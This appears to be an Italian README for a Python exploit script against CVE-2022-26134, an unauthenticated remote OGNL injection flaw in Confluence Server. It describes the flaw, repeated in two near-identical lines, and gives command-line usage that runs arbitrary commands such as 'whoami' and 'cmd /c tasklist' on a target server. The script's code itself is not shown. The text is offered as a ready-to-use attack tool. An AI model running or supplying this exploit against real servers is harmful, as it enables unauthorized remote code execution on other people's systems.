
(CVE-2022-26134)una vulnerabilità di iniezione OGNL non autenticata e remota che porta all'esecuzione di codice nel contesto del server Confluence
(CVE-2022-26134) una vulnerabilità di iniezione OGNL non autenticata e remota che consente l'esecuzione di codice nel contesto del server Confluence
Richiede: Python2 o Python3
Usage:
python cve_2022_26134.py -url target_url -cmd "ls -al"
python cve_2022_26134.py -url target_url -cmd "whoami"

se il target è un sistema Windows, utilizzare lo script come segue, ad esempio:
python3 cve_2022_26134.py -url target_url -cmd "cmd /c tasklist"
